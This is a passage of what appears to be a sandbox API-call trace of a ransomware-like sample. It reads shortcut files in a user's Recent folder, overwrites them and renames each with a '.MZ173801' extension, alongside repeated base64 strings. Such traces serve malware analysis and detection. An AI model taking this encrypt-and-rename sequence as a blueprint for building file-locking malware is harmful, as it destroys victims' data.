lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.815] GetCurrentThreadId () returned 0x1358 [0112.815] GetCurrentThreadId () returned 0x1358 [0112.815] GetCurrentThreadId () returned 0x1358 [0112.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcrVUSJG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcrvusjg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.815] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.815] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.815] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x27e [0112.815] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.816] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x27e, lpOverlapped=0x0) returned 1 [0112.816] CloseHandle (hObject=0x3f4) returned 1 [0112.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcrVUSJG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcrvusjg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.817] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x27e, lpOverlapped=0x0) returned 1 [0112.818] CloseHandle (hObject=0x3f4) returned 1 [0112.819] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcrVUSJG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcrvusjg.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcrVUSJG.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcrvusjg.lnk.mz173801")) returned 1 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] GetCurrentThreadId () returned 0x1358 [0113.117] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3466b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec3466b1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZrVO9ZIsn.flv.lnk", cAlternateFileName="ZRVO9Z~1.LNK")) returned 1 [0113.117] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.118] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZrVO9ZIsn.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zrvo9zisn.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3466b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec3466b1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x53f)) returned 1 [0113.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.118] GetCurrentThreadId () returned 0x1358 [0113.118] GetCurrentThreadId () returned 0x1358 [0113.118] GetCurrentThreadId () returned 0x1358 [0113.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.119] GetCurrentThreadId () returned 0x1358 [0113.119] GetCurrentThreadId () returned 0x1358 [0113.119] GetCurrentThreadId () returned 0x1358 [0113.119] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZrVO9ZIsn.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zrvo9zisn.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.119] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.119] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.119] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x53f [0113.120] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.120] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x53f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x53f, lpOverlapped=0x0) returned 1 [0113.120] CloseHandle (hObject=0x3f4) returned 1 [0113.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZrVO9ZIsn.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zrvo9zisn.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.121] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x53f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x53f, lpOverlapped=0x0) returned 1 [0113.122] CloseHandle (hObject=0x3f4) returned 1 [0113.123] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZrVO9ZIsn.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zrvo9zisn.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZrVO9ZIsn.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zrvo9zisn.flv.lnk.mz173801")) returned 1 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] GetCurrentThreadId () returned 0x1358 [0113.124] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cae5f4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9cae5f4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3cc, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zvmVe w.lnk", cAlternateFileName="ZVMVEW~1.LNK")) returned 1 [0113.124] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.124] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zvmVe w.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zvmve w.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cae5f4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9cae5f4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3cc)) returned 1 [0113.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.125] GetCurrentThreadId () returned 0x1358 [0113.125] GetCurrentThreadId () returned 0x1358 [0113.125] GetCurrentThreadId () returned 0x1358 [0113.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 